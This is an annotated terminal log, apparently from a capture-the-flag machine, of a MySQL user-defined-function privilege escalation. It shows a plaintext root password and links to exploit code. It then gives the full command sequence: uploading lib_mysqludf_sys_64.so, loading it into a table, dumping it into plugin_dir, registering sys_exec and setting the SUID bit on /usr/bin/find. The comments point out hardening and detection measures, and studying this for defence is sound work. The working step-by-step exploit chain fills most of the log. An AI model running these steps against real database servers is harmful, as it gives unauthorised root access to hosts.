www-data@banzai:/tmp$ mysql -u root -p
Enter password: EscalateRaftHubris123
# plugin_dir: the directory from which MySQL loads UDF shared libraries.
mysql> SHOW VARIABLES LIKE 'plugin_dir';
| Variable_name | Value |
| plugin_dir | /usr/lib/mysql/plugin/ |
1 row in set (0.00 sec)
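# Check secure_file_priv. An empty value means the server puts no directory restriction on LOAD_FILE() and SELECT ... INTO OUTFILE/DUMPFILE; a hardened server sets it to a dedicated directory or to NULL.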
mysql> SHOW VARIABLES LIKE "secure_file_priv";
| Variable_name | Value |
| secure_file_priv | |
1 row in set (0.00 sec)
Using https://gist.github.com/p0c/8587757
[OR] https://www.exploit-db.com/exploits/1518
# using ftp to upload
ftp> put lib_mysqludf_sys_64.so
local: lib_mysqludf_sys_64.so remote: lib_mysqludf_sys_64.so
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
8040 bytes sent in 0.00 secs (207.2308 MB/s)
ftp> chmod 777 lib_mysqludf_sys_64.so
200 SITE CHMOD command ok.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx 1 1001 1001 8040 Aug 30 16:49 lib_mysqludf_sys_64.so
226 Directory send OK.
# connect to mysql
# UDF-based escalation recorded in this session: a shared library is copied into
# plugin_dir through SQL and then registered as a function that runs OS commands.
# Each step relies on a server-side weakness, noted per statement so it can be
# hardened or monitored.
use mysql;
# Scratch table with a single BLOB column to hold the library bytes.
create table kashz(line blob);
# LOAD_FILE() reads the uploaded file from the web root. It is permitted here because
# secure_file_priv is empty (shown earlier in this session) and the session is root,
# which normally holds the FILE privilege. Application accounts should not hold FILE.
insert into kashz values(load_file('/var/www/html/lib_mysqludf_sys_64.so'));
# INTO DUMPFILE writes the raw bytes into plugin_dir. This only succeeds when the OS
# account running mysqld can write to that directory -- NOTE(review): presumably the
# case on this host; confirm from the directory's ownership and mode.
select * from kashz into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so';
# Registers sys_exec from the library now in plugin_dir. Detection points: unexpected
# rows in mysql.func, new files in plugin_dir, and CREATE FUNCTION ... SONAME
# statements in the general or audit log.
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
# The command runs with the privileges of the mysqld process. The setuid bit on the
# root-owned /usr/bin/find in the listing that follows indicates mysqld was running
# as root here; running it as a dedicated unprivileged account limits this step.
select sys_exec('chmod +s /usr/bin/find');
www-data@banzai:/var/www/html$ ls -la /usr/bin/find
-rwsr-sr-x 1 root root 221768 Feb 18 2017 /usr/bin/find